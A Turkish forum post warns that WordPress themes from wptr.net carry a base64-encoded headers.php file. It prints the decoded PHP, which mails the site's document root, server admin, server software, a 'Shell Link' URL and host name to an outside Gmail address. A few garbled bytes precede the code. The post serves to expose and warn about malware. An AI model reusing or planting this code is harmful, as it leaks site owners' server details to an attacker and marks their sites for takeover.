1- wptr.net tema avcısı
Bir kere wptr.net'den tema indirdiyseniz kesinlikle güvenlik açıgı olacaktır.Güvenlik açıgını da wptr.net'de ki uyanık arkadaşlar oluşturuyor. Gerçi ne yaptıklarını bilmeyen kalmadı ama olsun yine de bilgilenmeyen arkadaşlar için uyarımı yapayım. Wptr.net'den indirdiginiz temaların içinde header.php haricinde headers.php de oluyor ve bu dosyanın içindeki kodları base64 ile şifreliyorlar, haliyle kimse bişi anlamıyor, fakat base64 ile şifrelenmiş bu kodları ;
kırdıgımızda ise aynen şu kodlar çıkıyor ;
z��r�^$kime="indirelimhemen@gmail.com"; $baslik="WordPresS Tema Sw Avcisi V3.0"; $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn"; $EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn"; $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn"; $EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn"; $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn"; mail($kime, $baslik, $EL_MuHaMMeD);
Bu konuda arkadaşa hak veriyorum şimdi 4 farklı tema denedim 4 ünde de buna benzeyen farklı kod ve dışarıya bağlı, temayı kullandığınızda sitenizi mahvedebilecek onlarca yazılım ve şifreleme mevcut...